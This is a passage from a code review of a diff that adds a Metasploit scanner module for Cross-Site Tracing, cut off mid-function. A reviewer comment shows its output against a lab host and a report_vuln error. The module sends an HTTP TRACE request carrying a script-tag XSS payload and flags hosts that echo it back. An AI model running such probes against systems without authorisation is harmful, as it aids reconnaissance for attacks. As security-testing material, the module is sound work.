modules/auxiliary/scanner/http/xst.rb

```diff
@@ -0,0 +1,64 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+  # Exploit mixins should be called first
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::WmapScanServer
+  # Scanner mixin should be near last
+  include Msf::Auxiliary::Scanner
+
+  def initialize
+    super(
+      'Name'        => 'Cross-Site Tracing (XST) Checker',
+      'Description' => 'Checks if the host is vulnerable to Cross-Site Tracing (XST)',
+      'Author'       => [ 'Jay Turla <@shipcod3>' ],
+      'License'     => MSF_LICENSE
+    )
+  end
+
+  def run_host(target_host)
+
+    begin
+      res = send_request_raw({
+        'version'      => '1.0',
+        'uri'          => '/<script>alert("TRACE Payload");</script>', #XST Payload
+        'method'       => 'TRACE',
+        'headers' =>
+        {
+          'Cookie' => "TRACE ME PLS",
+        },
+      }, 10)
+
+      if res.nil?
+        print_error("no repsonse for #{target_host}")
+      elsif (res.code == 200 and res.body =~/>alert/)
+        print_good("#{target_host}:#{rport}-->#{res.code}")
+        print_good("Response Headers:\n #{res.headers}")
+        print_good("Response Body:\n #{res.body}")
+        print_good("#{target_host}:#{rport} is vulnerable to Cross-Site Tracing\n")
+        report_note(
```

Comment:
it gives me an error when using report_vuln:

[+] 192.168.93.129:80-->200
[+] Response Headers:
 Date: Sat, 27 Jun 2015 14:52:50 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch
Connection: close
Content-Type: message/http


[+] Response Body:
 TRACE /<script>alert("TRACE Payload");</script> HTTP/1.0
Host: 192.168.93.129
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Cookie: TRACE ME PLS
Content-Length: 0


[+] 192.168.93.129:80 is vulnerable to Cross-Site Tracing

[-] Auxiliary failed: ArgumentError Deprecated data column for vuln, use .info instead
[-] Call stack:
[-]   /opt/metasploit/apps/pro/msf3/lib/msf/core/db.rb:1681:in `report_vuln'
[-]   /opt/metasploit/apps/pro/msf3/lib/msf/core/auxiliary/report.rb:128:in `report_vuln'
[-]   /opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/xst.rb:52:in `run_host'
[-]   /opt/metasploit/apps/pro/msf3/lib/msf/core/auxiliary/scanner.rb:104:in `block (2 levels) in run'
[-]   /opt/metasploit/apps/pro/msf3/lib/msf/core/thread_manager.rb:100:in `call'
[-]   /opt/metasploit/apps/pro/msf3/lib/msf/core/thread_manager.rb:100:in `block in spawn'